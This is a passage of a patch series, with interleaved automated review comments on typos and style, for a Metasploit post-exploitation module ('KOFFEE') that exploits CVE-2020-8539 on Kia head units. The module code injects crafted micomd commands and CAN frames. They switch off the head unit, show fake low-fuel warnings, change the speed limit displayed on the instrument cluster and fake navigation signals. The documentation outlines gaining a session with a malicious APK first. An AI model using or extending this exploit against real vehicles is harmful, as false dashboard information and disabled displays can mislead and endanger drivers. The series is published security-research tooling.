4. Low screen brightness - 5. High screen brightness - 6. Low fuel warning message - 7. Navigation full screen - 8. Set navigation address - 9. Seek down - 10. Seek Up - 11. Switch off Infotainment - 12. Switch On Infotainment - 13. Camera Reverse On - 14. Camera Reverse Off - 15. Inject pre-crafted CAN frames into MM bus - 16. Inject custom command - 0. Exit -Koffee > 1 -[*] -- Sending Command -- -... -Koffee > 0 -[*] Post module execution completed +[*] -- Starting action -- +[*] -- Mute/umute radio -- +[+] -- Command Sent -- ``` diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index be301c7a5b..fee272fae8 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb 
@@ -32,8 +32,19 @@ class MetasploitModule < Msf::Post
 ],
 'Actions' => [
 [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ],
- [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It reduces radio volume' } ],
+ [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreses the radio volume' } ],
 [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ],
+ [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreses the head unit screen brightness' } ],
+ [ 'HIGH_SCREEN_BRIGHTNESS', { 'Description' => 'It increases the head unit screen brightness' } ],
+ [ 'LOW_FUEL_WARNING', { 'Description' => 'It pops up a low fuel message on the head unit' } ],
+ [ 'NAVIGATION_FULL_SCREEN', { 'Description' => 'It pops up the navigation app window' } ],
+ [ 'SET_NAVIGATION_ADDRESS', { 'Description' => 'It pops up the navigation address window' } ],
+ [ 'SEEK_DOWN_SEARCH', { 'Description' => 'It triggers the seek down radio frequency search' } ],
+ [ 'SEEK_UP_SEARCH', { 'Description' => 'It triggers the seek up radio frequency search' } ],
+ [ 'SWITCH_ON_Hu', { 'Description' => 'It switches on the head unit' } ],
+ [ 'SWITCH_OFF_Hu', { 'Description' => 'It switches off the head unit' } ],
+ [ 'CAMERA_REVERSE_ON', { 'Description' => 'It shows the parking camera video stream' } ],
+ [ 'CAMERA_REVERSE_OFF', { 'Description' => 'It hides the parking camera video stream' } ],
 [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ],
 [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ]
 ],
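Review bot: Two of the new action descriptions spell "decreases" as `decreses` (`REDUCE_RADIO_VOLUME`, `LOW_SCREEN_BRIGHTNESS`) and the unchanged first entry has `mutes/umutes`; these strings are what `show actions` displays, so they deserve a pass: `'It decreases the radio volume'`, `'It decreases the head unit screen brightness'`, `'It mutes/unmutes the radio'`. `SWITCH_ON_Hu` and `SWITCH_OFF_Hu` also break the all-caps convention of the other action names, which works only because `run` downcases the name before dispatch. The `initialize` call this table belongs to starts and ends outside the hunk.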
@@ -52,17 +63,15 @@ class MetasploitModule < Msf::Post
 end

 def send_in(m_cmd)
- print_status(' -- Sending Command -- ')
 cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}"
 cmd_exec(cmd)
- print_good(' -- Command Sent-- ')
+ print_good(' -- Command Sent -- ')
 end

 def send_out(m_cmd)
- print_status(' -- Sending Command -- ')
 cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}"
 cmd_exec(cmd)
- print_good(' -- Command Sent-- ')
+ print_good(' -- Command Sent -- ')
 end

 def send_custom(m_cmd)
@@ -116,6 +125,61 @@ class MetasploitModule < Msf::Post
 send_out('0112 F0')
 end

+ def action_low_screen_brightness
+ print_status(' -- Low screen brightness -- ')
+ send_in('8353 07 01')
+ end
+
+ def action_high_screen_brightness
+ print_status(' -- High screen brightness -- ')
+ send_in('8353 07 00')
+ end
+
+ def action_low_fuel_warning
+ print_status(' -- Low fuel warning -- ')
+ send_in('8353 0B 01')
+ end
+
+ def action_navigation_full_screen
+ print_status(' -- Navigation windows full screen -- ')
+ send_in('8353 0C 01')
+ end
+
+ def action_set_navigation_address
+ print_status(' -- Navigation address window pops up -- ')
+ send_in('8353 0D 03')
+ end
+
+ def action_seek_down_search
+ print_status(' -- Seek down radio search -- ')
+ send_out('133 01')
+ end
+
+ def action_seek_up_search
+ print_status(' -- Seek up radio search -- ')
+ send_out('133 02')
+ end
+
+ def action_switch_on_hu
+ print_status(' -- Switch on Head unit -- ')
+ send_out('170 01')
+ end
+
+ def action_switch_off_hu
+ print_status(' -- Switch off Head unit -- ')
+ send_out('170 00')
+ end
+
+ def action_camera_reverse_on
+ print_status(' -- Parking camera video stream on -- ')
+ send_in('8353 03 01')
+ end
+
+ def action_camera_reverse_off
+ print_status(' -- Parking camera video stream off -- ')
+ send_in('8353 03 00')
+ end
+
 def action_change_cluster_language
 print_status(' -- Korean -- ')
 send_out_custom('4D3 01')
From 3c64475da9323b56565cd10d88d0e224c4756bc6 Mon Sep 17 00:00:00 2001
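Review bot: `action_navigation_full_screen` and `action_set_navigation_address` send `8353 0C 01` and `8353 0D 03`, whereas the interactive menu removed in patch 4 sent `8350 0C 01` and `8350 0D 03` for the same two features over the same `inject` channel; if the leading word was changed on purpose it deserves a comment, otherwise this looks like a copy of the neighbouring `8353` brightness lines and the two actions will not do what their descriptions say. The spacing fix applied to `send_in`/`send_out` (`' -- Command Sent -- '`) in the first hunk is not applied to `send_custom` and `send_out_custom`, which still print `' -- Custom payload Sent-- '` and `' -- CAN bus frames sent-- '`. The eleven new methods share the same two-line shape, so a frozen table mapping action name to label and payload, iterated from `run`, would keep the frames in one place; that is a style choice rather than a defect.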
From: gianpyc Date: Thu, 22 Apr 2021 04:34:22 -0400 Subject: [PATCH 6/8] Adding new actions on the module and updated documentation --- .../modules/post/android/local/koffee.md | 6 +- modules/post/android/local/koffee.rb | 63 +++++++++++++++++-- 2 files changed, 64 insertions(+), 5 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index f5d27ff59e..09f0906902 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -35,7 +35,11 @@ metasploit input console the action name in lowercase, e.g., camera_reverse_off. - CAMERA_REVERSE_OFF: It hides the parking camera video stream - CAMERA_REVERSE_ON: It shows the parking camera video stream -- CHANGE_CLUSTER_LANGUAGE: It changes the cluster language +- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language +- CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster +- CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster +- CLUSTER_ROUNDABOUT_FARAWAY: It shows a round about signal with variable distance in the instrument cluster +- CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster - HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness - INJECT_CUSTOM: It injects custom micom payloads - LOW_FUEL_WARNING: It pops up a low fuel message on the head unit diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index fee272fae8..34b90f62b5 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb 
@@ -41,11 +41,15 @@ class MetasploitModule < Msf::Post
           [ 'SET_NAVIGATION_ADDRESS', { 'Description' => 'It pops up the navigation address window' } ],
           [ 'SEEK_DOWN_SEARCH', { 'Description' => 'It triggers the seek down radio frequency search' } ],
           [ 'SEEK_UP_SEARCH', { 'Description' => 'It triggers the seek up radio frequency search' } ],
-          [ 'SWITCH_ON_Hu', { 'Description' => 'It switches on the head unit' } ],
-          [ 'SWITCH_OFF_Hu', { 'Description' => 'It switches off the head unit' } ],
+          [ 'SWITCH_ON_HU', { 'Description' => 'It switches on the head unit' } ],
+          [ 'SWITCH_OFF_HU', { 'Description' => 'It switches off the head unit' } ],
           [ 'CAMERA_REVERSE_ON', { 'Description' => 'It shows the parking camera video stream' } ],
           [ 'CAMERA_REVERSE_OFF', { 'Description' => 'It hides the parking camera video stream' } ],
-          [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ],
+          [ 'CLUSTER_CHANGE_LANGUAGE', { 'Description' => 'It changes the cluster language' } ],
+          [ 'CLUSTER_SPEED_LIMIT', { 'Description' => 'It changes the speed limit shown in the instrument cluster' } ],
+          [ 'CLUSTER_ROUNDABOUT_FARAWAY', { 'Description' => 'It shows a round about signal with variable distance in the instrument cluster ' } ],
+          [ 'CLUSTER_RANDOM_NAVIGATION', { 'Description' => 'It shows navigation signals in the instrument cluster ' } ],
+          [ 'CLUSTER_RADIO_INFO', { 'Description' => 'It shows radio info in the instrument cluster ' } ],
           [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ]
         ],
         'DefaultAction' => 'TOGGLE_RADIO_MUTE',
@@ -180,7 +184,7 @@ class MetasploitModule < Msf::Post
     send_in('8353 03 00')
   end
 
-  def action_change_cluster_language
+  def action_cluster_change_language
     print_status(' -- Korean -- ')
     send_out_custom('4D3 01')
     print_status(' -- Arabic -- ')
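Review bot: Three of the four new Actions entries carry a trailing space inside the Description string (CLUSTER_ROUNDABOUT_FARAWAY, CLUSTER_RANDOM_NAVIGATION and CLUSTER_RADIO_INFO all end in `cluster '`), which shows up as a stray space in `show actions` output and will not match the wording in the documentation file changed in the same commit. Trim them, and while there, "round about" is one word in this sense: `[ 'CLUSTER_ROUNDABOUT_FARAWAY', { 'Description' => 'It shows a roundabout signal with variable distance in the instrument cluster' } ],`. The Actions array is inside initialize, whose start and end lie outside the hunk.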
@@ -191,6 +195,57 @@ class MetasploitModule < Msf::Post
     send_out_custom('4D3 12')
   end
 
+  def action_cluster_speed_limit
+    print_status(' -- Chaning speed limit on the instrument cluster -- ')
+    send_out_custom('4DB 00 0A')
+    send_out_custom('4DB 00 2A')
+    send_out_custom('4DB 00 3A')
+    send_out_custom('4DB 00 5A')
+    send_out_custom('4DB 00 7A')
+    send_out_custom('4DB 00 9A')
+    send_out_custom('4DB 00 AA')
+    send_out_custom('4DB 00 BA')
+  end
+
+  def action_cluster_roundabout_faraway
+    print_status(' -- km -- ')
+    send_out_custom('4D1 66 00 00 00 14 86 10 00')
+    print_status(' -- mi -- ')
+    send_out_custom('4D1 66 00 00 00 14 86 20 00')
+    print_status(' -- ft -- ')
+    send_out_custom('4D1 66 00 00 00 14 86 30 00')
+    print_status(' -- yd -- ')
+    send_out_custom('4D1 66 00 00 00 14 86 40 00')
+    print_status(' -- No distance -- ')
+    send_out_custom('4D1 66 00 00 00 14 86 50 00')
+  end
+
+  def action_cluster_random_navigation
+    print_status(' -- Calculating the route -- ')
+    send_out_custom('4D1 09')
+    print_status(' -- Recalculating the route -- ')
+    send_out_custom('4D1 0A')
+    print_status(' -- Straight ahead -- ')
+    send_out_custom('4D1 0D')
+    print_status(' -- Exit on the Right -- ')
+    send_out_custom('4D1 13')
+    print_status(' -- Exit on the Left -- ')
+    send_out_custom('4D1 14')
+  end
+
+  def action_cluster_radio_info
+    print_status(' -- USB Music -- ')
+    send_out_custom('4D6 65')
+    print_status(' -- Android Auto -- ')
+    send_out_custom('4D6 6F')
+    print_status(' -- FM 168.17 -- ')
+    send_out_custom('4D6 11 9D 00 00 00 00 5F 83')
+    print_status(' -- FM1 168.17 -- ')
+    send_out_custom('4D6 12 9D 00 00 00 00 5F 83')
+    print_status(' -- FM2 168.17 -- ')
+    send_out_custom('4D6 13 9D 00 00 00 00 5F 83')
+  end
+
   def action_inject_custom
     print_status(" -- Injecting custom payload (#{datastore['CMD_PAYLOAD']}) -- ")
     send_custom(datastore['CMD_PAYLOAD'])
From 12cb8b3f0203854a075ce38a1b5aac9bc58e9195 Mon Sep 17 00:00:00 2001
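Review bot: The status line at the top of action_cluster_speed_limit misspells its one verb, `print_status(' -- Changing speed limit on the instrument cluster -- ')`, and the later "Fix some typos" commit in this series does not touch it. The three methods below it alternate a label with a send_out_custom call five times each; a hash of label to payload iterated with `each { |label, frame| print_status(" -- #{label} -- "); send_out_custom(frame) }` would halve their length and make the label/payload pairing visible at a glance. Note that action_cluster_speed_limit emits eight frames with no label between them, so the operator only sees the single status line for the whole burst; if send_out_custom repeats each frame NUM_MSG times (its body is outside this hunk), a per-frame vprint_status would help when tuning PERIOD.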
From: gianpyc
Date: Thu, 22 Apr 2021 04:49:22 -0400
Subject: [PATCH 7/8] Removed not needed require

---
 modules/post/android/local/koffee.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb
index 34b90f62b5..18be6b1a24 100644
--- a/modules/post/android/local/koffee.rb
+++ b/modules/post/android/local/koffee.rb
@@ -4,7 +4,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'readline'
 
 class MetasploitModule < Msf::Post
 
From 50873d3d888d84f1e897e184ad3431f148304c35 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Fri, 23 Apr 2021 09:24:38 -0400
Subject: [PATCH 8/8] Fix some typos and markdown formatting

---
 .../modules/post/android/local/koffee.md | 77 +++++++++++--------
 modules/post/android/local/koffee.rb     | 13 ++--
 2 files changed, 50 insertions(+), 40 deletions(-)

diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md
index 09f0906902..de10cff70c 100644
--- a/documentation/modules/post/android/local/koffee.md
+++ b/documentation/modules/post/android/local/koffee.md
@@ -1,9 +1,8 @@
 ## Vulnerable Application
 
-KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user
-to execute the micomd binary with valid payloads on Kia Motors Head Units.
-By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames
-into the Multimedia CAN (M-Can) of the vehicle.
+KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerability that allows a user to execute the
+`micomd` binary with valid payloads on Kia Motors Head Units. By using KOFFEE an attacker can send crafted `micomd`
+commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
 
 ### Vulnerable Head Unit software versions
 - SOP.003.30.180703
@@ -21,38 +20,48 @@ into the Multimedia CAN (M-Can) of the vehicle. * An active session with the Head Unit ## Options -- MICOMD: it contains the path to micomd executable -- NUM_MSG: it expresses the number of MICOM commands sent each time -- PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames -- SESSION: it referes to the metasploit session number on which this module is run. -- CMD_PAYLOAD: It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. -By default it is set to `00 00 00`. This options works only for the `INJECT_CUSTOM` action + +### MICOMD +It contains the path to micomd executable + +### NUM_MSG +It expresses the number of MICOM commands sent each time + +### PERIOD +It indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames + +### SESSION +It refers to the metasploit session number on which this module is run. + +### CMD_PAYLOAD +It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. By default it is set to `00 00 00`. This +options works only for the `INJECT_CUSTOM` action ## Actions -The following actions can be triggered on the Head Unit. An action can be triggerd by inserting in the -metasploit input console the action name in lowercase, e.g., camera_reverse_off. +The following actions can be triggered on the Head Unit. An action can be triggered by inserting in the Metasploit input +console the action name in lowercase, e.g., `camera_reverse_off`. 
-- CAMERA_REVERSE_OFF: It hides the parking camera video stream -- CAMERA_REVERSE_ON: It shows the parking camera video stream -- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language +- CAMERA_REVERSE_OFF: It hides the parking camera video stream +- CAMERA_REVERSE_ON: It shows the parking camera video stream +- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language - CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster - CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster - CLUSTER_ROUNDABOUT_FARAWAY: It shows a round about signal with variable distance in the instrument cluster - CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster -- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness -- INJECT_CUSTOM: It injects custom micom payloads -- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit -- LOW_SCREEN_BRIGHTNESS: It decreses the head unit screen brightness -- MAX_RADIO_VOLUME: It sets the radio volume to the max - - NAVIGATION_FULL_SCREEN: It pops up the nagitaion app -- REDUCE_RADIO_VOLUME: It reduces radio volume -- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search -- SEEK_UP_SEARCH: It triggers the seek up radio frequency search -- SET_NAVIGATION_ADDRESS: It pops up the nagitaion address window -- SWITCH_OFF_Hu: It switches off the head unit -- SWITCH_ON_Hu: It switches on the head unit - - TOGGLE_RADIO_MUTE It mutes/umutes the radio +- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness +- INJECT_CUSTOM: It injects custom micom payloads +- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit +- LOW_SCREEN_BRIGHTNESS: It decreases the head unit screen brightness +- MAX_RADIO_VOLUME: It sets the radio volume to the max +- NAVIGATION_FULL_SCREEN: It pops up the navigation app +- REDUCE_RADIO_VOLUME: It reduces radio volume +- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search +- SEEK_UP_SEARCH: It 
triggers the seek up radio frequency search +- SET_NAVIGATION_ADDRESS: It pops up the navigation address window +- SWITCH_OFF_Hu: It switches off the head unit +- SWITCH_ON_Hu: It switches on the head unit +- TOGGLE_RADIO_MUTE It mutes/unmutes the radio An action can be also triggered using the commands: - [ ] `set action CAMERA_REVERSE_ON` @@ -65,16 +74,16 @@ The commands to use to trigger this action are - [ ] `run` ## Scenarios -KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). -First, an attacker may create a malicious apk to generate a remote connection with the HU. -For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, -starts an active session. Now, the attacker is able to use the KOFFEE exploit to take control of the HU and -inject CAN bus frames into the M-CAN bus of the vehicle. +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an +attacker may create a malicious apk to generate a remote connection with the HU. For instance, using msfvenom or other +tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. Now, the +attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the +vehicle. ### Usage -```bach +``` msf6 > use post/android/local/koffee msf6 post(android/local/koffee) > set session 1 session => 1 diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index 18be6b1a24..e9c15cfc0e 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb 
@@ -13,10 +13,11 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'KOFFEE - Kia OFFensivE Exploit',
         'Description' => %q{
-          This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors.
-          This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version.
-          This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker
-          to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
+          This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to
+          attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on
+          SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an
+          active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head
+          unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
         },
         'SessionTypes' => ['meterpreter'],
         'Author' =>
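Review bot: The re-wrapped Description keeps the word-order slip "allows an to attacker execute" from the removed first line, so the module's own summary still reads wrongly after a typo-fix commit. The first two new lines should read `... vulnerability that allows an attacker to` / `execute the micomd binary file on the head unit of Kia Motors. ...`, re-wrapping the rest of the paragraph to the same width. The description also says "allows an attacker to send crafted micomd commands that allow the attacker to control"; one "allows" would do. The %q{} literal sits inside initialize, whose start and end are outside the hunk.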
@@ -31,9 +32,9 @@ class MetasploitModule < Msf::Post
         ],
         'Actions' => [
           [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ],
-          [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreses the radio volume' } ],
+          [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreases the radio volume' } ],
           [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ],
-          [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreses the head unit screen brightness' } ],
+          [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreases the head unit screen brightness' } ],
           [ 'HIGH_SCREEN_BRIGHTNESS', { 'Description' => 'It increases the head unit screen brightness' } ],
           [ 'LOW_FUEL_WARNING', { 'Description' => 'It pops up a low fuel message on the head unit' } ],
           [ 'NAVIGATION_FULL_SCREEN', { 'Description' => 'It pops up the navigation app window' } ],
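Review bot: The context line for TOGGLE_RADIO_MUTE still reads `'It mutes/umutes the radio'` while the same commit corrects "umutes" to "unmutes" in the documentation file, so the module description and its docs now disagree on the default action's wording. Fix it alongside the two "decreses" corrections in this hunk: `[ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/unmutes the radio' } ],`. The Actions array is part of initialize, which begins and ends outside the hunk.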